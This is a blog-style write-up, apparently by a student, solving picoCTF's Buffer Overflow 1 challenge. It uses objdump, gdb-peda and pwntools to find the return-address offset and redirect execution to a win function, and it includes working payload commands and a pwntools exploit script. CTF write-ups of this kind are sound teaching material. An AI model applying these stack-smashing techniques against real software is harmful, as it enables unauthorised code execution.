Binary Exploitation

In the Introduction to Information Security (IIS) course taken in OMSCS, I learned a lot about Buffer Overflow. Therefore, I will organize the solutions based on an actual CTF problem.

Overall

During my second course in OMSCS, I solved a Buffer Overflow problem in the Introduction to Information Security (IIS) course. Since I gained a lot of insights from this experience, I decided to summarize the solution. For more details about the IIS course, please refer to the following article:

CS 6035 Introduction to Information Security

The Buffer Overflow problem I am solving this time is based on an actual CTF challenge. CTF (Capture the Flag) is a contest where participants exploit vulnerabilities to capture flags. I referred to picoCTF, a permanent CTF platform, as there was a problem that seemed to apply what I learned in class. picoCTF hosts CTF challenges aimed at middle and high school students, so it is said that many of the problems are relatively simple. I solved the Buffer Overflow 1 problem in the Binary Exploitation category of picoCTF. I logged into picoCTF and worked on the problem in a web shell.

picoCTF

Note: This post is not intended for actual attacks; the purpose of this introduction is to raise awareness of these types of attacks.

Source Code

First, upon examining the source code, we see that the vuln function is called from main, and the gets function is used to read into the buffer buf. In the vuln function, there is an operation that prints the return address. The return address is a record of where the program should return after a function call.

Additionally, it is observed that the win function is defined but not referenced from anywhere. The source code is as follows:

source_code

The return address is explained here:
Call Stack

As for the gets function, it allows for a string input that cannot be defined in advance, making it possible to execute a Buffer Overflow.
Essential Guide to the gets Function in C with 10 Clear Examples

When executing the binary file, it is confirmed that the return address of the vuln function is printed, which is 0x804932f.

1
2
3
4


~$ ./vuln
Please enter your string: 
a
Okay, time to return... Fingers Crossed... Jumping to 0x804932f

Disassemble

To understand why the return address of the vuln function is 0x804932f, we can disassemble the compiled executable using objdump and convert it into assembly language for verification.

The following command allows for the disassembly of the executable file named vuln:

1

objdump -D vuln > vuln.asm

For instructions on how to disassemble an ELF executable file with the corresponding C source code using objdump, refer to the following link:

How to Disassemble an ELF Executable with C Source Code Using objdump

When examining the main section of vuln.asm, it is observed that the vuln function is called at 0x804932a. Therefore, when the executable is run, the return address from the vuln function back to main is the address following 0x804932a, which is 0x804932f.

In order to obtain the flag this time, it is necessary to overwrite this return address with the address of the win function and perform a call to a function that would not normally be executed.

disassemble_main

Debug

While it is possible to debug using gdb, its readability is not very high. Therefore, I installed gdb-peda by following the steps outlined below:
Using the gdb Debugger

As described in the link above regarding the usage of gdb, when debugging begins, you can set breakpoints using the b command. I set a breakpoint for the vuln function as follows. Additionally, with gdb-peda, it is possible to display registers, code, and stack all at once.

1

b *vuln

When entering the vuln function, I checked the top of the stack, which showed the value 0xfffef54c. From this, I was able to confirm the return address, which is 0x804932f. The result of the info frame command also indicates that the saved EIP (Extended Instruction Pointer) is 0x804932f, which, as noted in the following information, represents the return address.

saved eip “0x804869a” is the so called “return address”, i.e., the instruction to resume in the caller stack frame after returning from this callee stack. It is pushed onto the stack upon the “CALL” instruction (save it for return).

How to interpret GDB “info frame” output?

gdb_vuln

When I input the string test, I observed the value 0xfffef520, confirming that the string “test” is stored at the address 0xfffef520.

gdb_input

To summarize, the return address of the vuln function is stored at 0xfffef54c. Since the stack grows downwards as execution progresses, the buffer (buf) is stored at 0xfffef520. The difference between these addresses is calculated as follows:

0xfffef54c - 0xfffef520 = 0x2c

This indicates that the return address exists 44 bytes away from the buffer at 0xfffef520. As a result, it appears possible to overwrite the return address by providing an input that consists of 44 bytes of arbitrary characters followed by the address of the win function.

Solution

After confirming the addresses above and calculating the position of the return address within the input, it is possible to efficiently verify this using the Python library pwntools. By utilizing the cyclic function in pwntools, we can generate a pattern string as follows:

1
2
3
4


>>> from pwn import *
>>> cyclic(100)
b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'
>>> 

When I execute the generated pattern string as input to the target executable in gdb, I can see that the return address has been overwritten to 0x6161616c.

1

run <<< $(python3 -c 'import sys; sys.stdout.write("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa")')

gdb_padding

Since the return address has been overwritten to 0x6161616c, we can utilize the cyclic_find function to determine the position of 0x6161616c within the generated string. This allows us to confirm which character corresponds to the return address and how many characters precede it. The result is as follows:

We obtain a string length of 44 characters, which confirms that the return address indeed corresponds to 44 bytes, aligning with our previous calculations regarding the addresses. Therefore, we simply need to append the return address of the win function to this string.

1
2
3


>>> cyclic(cyclic_find( 0x6161616c ))
b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa'
>>> 

To obtain the address of the win function, I will re-examine the disassembled vuln.asm. It is determined that the win function starts at 0x080491f6. Therefore, I will append 0x080491f6 to the previously obtained 44-byte string.

disassemble_win

The address of the win function is 0x080491f6. However, since it is in little-endian format, the bytes are handled from the least significant byte to the most significant byte. Therefore, 0x080491f6 should be represented in reverse order for input, resulting in \xf6\x91\x04\x08.

1
2


>>> cyclic(cyclic_find( 0x6161616c )) + p32( 0x080491f6 )
b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa\xf6\x91\x04\x08'

Therefore, by constructing the input as follows, it becomes possible to call the win function:

1

run <<< $(python3 -c 'import sys; sys.stdout.write("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa")'; echo -e '\xf6\x91\x04\x08')

It has been confirmed that the return address has been successfully overwritten with the address of the win function. After the execution of vuln completes, the program does not return to main, but instead directly calls the win function. This behavior confirms that the exploit was successful.

gdb_payload

gdb_win

In picoCTF, it is necessary to pass the constructed input to the specified instance to retrieve the flag. By executing the following command, you can successfully obtain the flag:

1

(python3 -c 'import sys; sys.stdout.write("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa")'; echo -e '\xf6\x91\x04\x08') | nc saturn.picoctf.net <port>

In cases where the flag can be obtained by passing input to the executable, it is also possible to accomplish this entirely within Python. You can use the following script:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


from pwn import *

context.update(arch='x86_64', os='linux')
payload  = cyclic(   cyclic_find( 0x6161616c ) )

payload += p32( 0x080491f6 )
p = process(os.getcwd() + "/vuln")

p.sendline(payload)
p.interactive()

[Summary of Pwntools Functions and Usage [Japanese]#CTF #Pwn] (https://qiita.com/8ayac/items/12a3523394080e56ad5a)

Reflection

This experience provided a great opportunity to touch on registers and assembly language. By performing debugging, I was able to verify the behavior of the stack and the role of the return address, which deepened my understanding of how programs operate. I believe that the knowledge gained from this experience will serve as a valuable introduction when I learn more in-depth topics in future OS classes.